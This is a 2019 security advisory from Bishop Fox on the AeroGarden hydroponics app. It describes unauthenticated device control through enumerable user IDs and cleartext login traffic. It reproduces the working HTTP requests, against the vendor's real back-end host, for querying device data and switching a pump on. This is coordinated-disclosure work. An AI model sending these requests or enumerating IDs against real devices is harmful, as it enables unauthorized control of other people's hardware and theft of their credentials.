AeroGarden Version 1.3.1 - Multiple Vulnerabilities

by Jason Gay, on Jul 30, 2019 10:16:40 AM

ADVISORY SUMMARY

AeroGrow International is a company that produces consumer hydroponic growing
hardware for plants (e.g., herbs, vegetables, and flowers). The hardware product can be
controlled with a mobile application for specific models of their hydroponic growing kits.
The project’s official website is http://www.aerogarden.com. The latest version of the
mobile application is 1.3.1.

Impact

Both identified vulnerabilities would be detrimental to AeroGarden users; an attacker could cause the devices to inflict damage to plant life or an attacker could capture traffic to access users’ account information.

Risk Level

Medium and High 

Affected Vendor

Product Vendor

Product Name

Affected Version

AeroGrow International AeroGarden 1.3.1

 

Vulnerabilities List:

Solution

Incorrect Access Controls: Implement proper access controls for user actions throughout the application.

Insecure Network Transmission: Enforce the use of secure channels for data transmission.

Credits

Jason Gay, Security Associate, Bishop Fox - jgay@bishopfox.com

Timeline

  1. 02/20/2019: Initial discovery
  2. 03/21/2019: First attempt to contact vendor
  3. 04/17/2019: First contact with vendor
  4. 07/30/2019: Public Disclosure

VULNERABILITIES

Incorrect Access Controls

This version of the AeroGarden application is affected by incorrect access controls. Any user can request information about other users’ Wi-Fi-enabled AeroGarden hardware products, and then use this information to change settings (such as water pump run time, light settings, and vacation mode settings). The vulnerability can be exploited by any remote user without authentication.

CVE ID

Security Risk

Impact

Access Vector

N/A Medium Incorrect Access Control Remote


Further Details

  • CVSS Base Score: 5.3
  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

By observing the communication between the mobile application and the Amazon EC2 back end, the testing team revealed that the requests to execute commands on the AeroGarden hardware only required the MAC address (airGuid) of the hardware and the numerical user ID (userID) associated with that hardware.

The testing team obtained this information by issuing the following request:

Request 

POST /api/Custom/QueryUserDevice HTTP/1.1 Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080 Content-Type: application/x-www-form-urlencoded Connection: close Accept: */* User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00) Accept-Language: en-US;q=1 Content-Length: 12 Accept-Encoding: gzip, deflate userID=[REDACTED]

The response returned the following information:

Response

{"configID":[REDACTED],"airGuid":[REDACTED],"lightCycle":"08000100","pumpCycle":"00050037","lightTemp":1,"lightStat":1,"clock":"160503","pumpStat":0,"pumpHydro":0,"pumpTest":1,"pumpDrain":null,"pumpDrainState":null,"pumpLevel":0,"pumpRemind4Hour":0,"gardenType":2,"plantedType":0,"plantedName":"S2l0Y2hlbg==","totalDay":120,"plantedDay":47,"nutriCycle":14,"nutriRemindDay":12,"nutriStatus":0,"alarmAllow":0,"plantedDate":"d2:40:d0:55:94:89","nutrientDate":[REDACTED]","updateDate":"2019-02-22T02:28:31","createDate":null,"swVersion":"MFW-V0.20","hwVersion":"SW-V1.18","bwVersion":"HW-V3.0","oldPlantedDay":47,"deviceID":"[REDACTED]","deviceIP":"[REDACTED]","chooseGarden":0,"oldlightCycle":null,"vacationMode":0,"bwConnectedSsid":null,"nutriStatusFlag":"0","nutriStatusDate":"0001-01-01T00:00:00","remark":null,"imgUrl":null,"timezone":"0","audioAlarmStat":0,"audioAlarmCycleSet":0,"audioAlarmCycle":null}]

By iterating through the possible 5-digit combos for the userID during testing, the team could retrieve the MAC address (airGuid) of various units not under their control. Only these two pieces of information were necessary to issue commands to the hardware. 

With this information, an attacker could issue the following command to turn on the water pump for one minute:

POST /api/Custom/UpdateDeviceConfig HTTP/1.1 Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080 Content-Type: application/x-www-form-urlencoded Connection: close Accept: */* User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00) Accept-Language: en-US;q=1 Content-Length: 118 Accept-Encoding: gzip, deflate airGuid=[REDACTED]&chooseGarden=0&plantConfig=%7B%0A%20%20%22pumpTest%22%20%3A%201%0A%7D&userID=[REDACTED]

It was confirmed that the unit then ran its pump for one minute. By reviewing different options within the mobile application, different commands could also be issued to alter the light cycle, set vacation mode, or return the devices to their default settings. An attacker could make the motor run until damaged or change options and timing to damage plant life in the system.

No authentication was required for exploitation.

Insecure Network Transmission

The AeroGarden application transmits not only request for command execution in cleartext but also login credentials for the user's account.

CVE ID

Security Risk

Impact

Access Vector

N/A High Information Disclosure Remote


Further Details

  • CVSS Base Score: 9.1
  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

As shown with the Incorrect Access Control issue in this application, network communication between the mobile application and the Amazon EC2 instance occurs over insecure HTTP channels. During testing, insecure transmission of login information from the application was observed, as shown below:

POST /api/Admin/Login HTTP/1.1 Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080 Content-Type: application/x-www-form-urlencoded Connection: close Accept: */* User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00) Accept-Language: en-US;q=1 Content-Length: 61 Accept-Encoding: gzip, deflate mail=[REDACTED]&userPwd=[REDACTED]

If an attacker were able to capture this traffic, they could access a user’s account on the AeroGarden website, where they could access personal information (such as address and payment information), depending on whether the user has saved this information to the site or not.

Vulnerabilities:Incorrect Access ControlsInsecure Network Transmission

Comments

Vulnerability Disclosure Policy

Bishop Fox takes security issues very seriously. We believe in coordinated disclosure, and we work closely with vendors and clients to patch vulnerabilities promptly. More on our Disclosure Policy →

Subscribe to Updates